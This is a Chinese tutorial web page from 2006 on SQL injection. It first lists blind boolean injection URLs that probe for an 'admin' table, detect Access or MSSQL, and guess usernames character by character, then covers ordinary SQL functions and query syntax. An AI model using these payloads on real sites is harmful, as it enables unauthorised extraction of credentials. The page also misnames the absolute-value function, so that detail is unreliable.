好学IT学院:IT信息技术分享交流平台
好学网>>好学IT学院>网络安全技术>>安全防护技术
快速学习和理解SQL注入及SQL查询技术
学段:职业成长  学科:计算机科学与技术  标签:安全  来源:互联网  作者:好学IT学院整理  发布时间:2006-10-02  ★★★加入收藏〗〖手机版
摘要:一、相关SQL注入技术检测可否注入http://127.0.0.1/xx?id=11 and 1=1 (正常页面)http://127.0.0.1/xx?id=11 and 1=2 (出错页面)检测表段的http://127.0.0.1/x……

一、相关SQL注入技术

检测可否注入

http://127.0.0.1/xx?id=11 and 1=1 (正常页面)

http://127.0.0.1/xx?id=11 and 1=2 (出错页面)

检测表段的

http://127.0.0.1/xx?id=11 and exists (select * from admin)

检测字段的

http://127.0.0.1/xx?id=11 and exists (select username from admin)

检测ID

http://127.0.0.1/xx?id=11 and exists (select id from admin where ID=1)

检测长度的

http://127.0.0.1/xx?id=11 and exists (select id from admin where len(username)=5 and ID=1)

检测长度的

http://127.0.0.1/xx?id=11 and exists (select id from admin where len(username)=5 and ID=1)

检测是否为MSSQL数据库

http://127.0.0.1/xx?id=11 and exists (select * from sysobjects)

检测是否为英文

(ACCESS数据库)

http://127.0.0.1/xx?id=11 and exists (select id from admin where asc(mid(username,1,1)) between 30 and 130 and ID=1)  (MSSQL数据库)

http://127.0.0.1/xx?id=11 and exists (select id from admin where unicode(substring(username,1,1)) between 30 and 130 and ID=1)

检测英文的范围

(ACCESS数据库)

http://127.0.0.1/xx?id=11 and exists (select id from admin where asc(mid(username,1,1)) between 90 and 100 and ID=1)  (MSSQL数据库)

http://127.0.0.1/xx?id=11 and exists (select id from admin where unicode(substring(username,1,1)) between 90 and 100 and ID=1)

检测那个字符

(ACCESS数据库)

http://127.0.0.1/xx?id=11 and exists (select id from admin where asc(mid(username,1,1))=97 and ID=1)  (MSSQL数据库)

http://127.0.0.1/xx?id=11 and exists (select id from admin where unicode(substring(username,1,1))=97 and ID=1)

二、常用SQL函数及查询语法

Access:asc(字符) SQLServer:unicode(字符)

作用:返回某字符的ASCII码 Access:chr(数字) SQLServer:nchar(数字)

作用:与asc相反,根据ASCII码返回字符 Access:mid(字符串,N,L) SQLServer:substring(字符串,N,L)

作用:返回字符串从N个字符起长度为L的子字符串,即N到N+L之间的字符串 Access:abc(数字) SQLServer:abc (数字)

作用:返回数字的绝对值(在猜解汉字的时候会用到) Access:A between B And C SQLServer:A between B And C

作用:判断A是否界于B与C之间

and exists(Select top 1 * From 用户 order by id)

1.在查询结果中显示列名:

a.用as关键字:select name as ’姓名’   from students order by age

b.直接表示:select name ’姓名’   from students order by age

2.精确查找:

a.用in限定范围:select * from students where native in (’湖南’, ’四川’)

b.between...and:select * from students where age between 20 and 30

c.“=”:select * from students where name = ’李山’

d.like:select * from students where name like ’李%’ (注意查询条件中有“%”,则说明是部分匹配,而且还有先后信息在里面,即查找以“李”开头的匹配项。所以若查询有“李”的所有对象,应该命令:’%李%’;若是第二个字为李,则应为’_李%’或’_李’或’_李_’。)

e.[]匹配检查符:select * from courses where cno like ’[AC]%’ (表示或的关系,与"in(...)"类似,而且"[]"可以表示范围,如:select * from courses where cno like ’[A-C]%’)

3.对于时间类型变量的处理

a.smalldatetime:直接按照字符串处理的方式进行处理,例如:select * from students where birth > = ’1980-1-1’ and birth <= ’1980-12-31’ 

快速学习理解SQL注入技术